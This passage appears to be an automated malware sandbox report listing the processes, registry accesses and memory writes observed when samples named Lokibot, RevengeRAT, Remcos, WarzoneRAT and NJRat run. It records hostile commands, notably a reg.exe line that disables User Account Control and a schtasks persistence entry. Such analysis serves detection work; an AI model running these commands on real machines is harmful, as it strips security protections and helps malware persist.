PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 2356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2948 wrote to memory of 4404 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\Downloads\Lokibot.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\Downloads\Lokibot.exe N/A

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://wearedevs.net

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8ea8346f8,0x7ff8ea834708,0x7ff8ea834718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2120 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2244 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1820 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6508 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5252 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7384 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7488 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6784 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5700 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3504 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5252 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6712 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7676 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4800 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7204 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7212 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5028 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7256 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6724 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7536 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6692 /prefetch:8

C:\Users\Admin\Downloads\Lokibot.exe

"C:\Users\Admin\Downloads\Lokibot.exe"

C:\Users\Admin\Downloads\Lokibot.exe

"C:\Users\Admin\Downloads\Lokibot.exe"

C:\Users\Admin\Downloads\RevengeRAT.exe

"C:\Users\Admin\Downloads\RevengeRAT.exe"

C:\Users\Admin\Downloads\RevengeRAT.exe

"C:\Users\Admin\Downloads\RevengeRAT.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Users\Admin\Downloads\Remcos.exe

"C:\Users\Admin\Downloads\Remcos.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "

C:\Users\Admin\Downloads\Remcos.exe

"C:\Users\Admin\Downloads\Remcos.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files (x86)\Internet Explorer\iexplore.exe

"C:\Program Files (x86)\Internet Explorer\iexplore.exe"

C:\Windows\SysWOW64\PING.EXE

PING 127.0.0.1 -n 2

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\Downloads\Remcos.exe

"C:\Users\Admin\Downloads\Remcos.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files (x86)\Internet Explorer\iexplore.exe

"C:\Program Files (x86)\Internet Explorer\iexplore.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\Downloads\WarzoneRAT.exe

"C:\Users\Admin\Downloads\WarzoneRAT.exe"

C:\Users\Admin\Downloads\WarzoneRAT.exe

"C:\Users\Admin\Downloads\WarzoneRAT.exe"

C:\Windows\SysWOW64\Userdata\Userdata.exe

"C:\Windows\SysWOW64\Userdata\Userdata.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files (x86)\Internet Explorer\iexplore.exe

"C:\Program Files (x86)\Internet Explorer\iexplore.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jFvfxe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp18F8.tmp"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1612 -ip 1612

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1144

C:\Users\Admin\Downloads\NJRat.exe

"C:\Users\Admin\Downloads\NJRat.exe"

C:\Users\Admin\Downloads\NJRat.exe

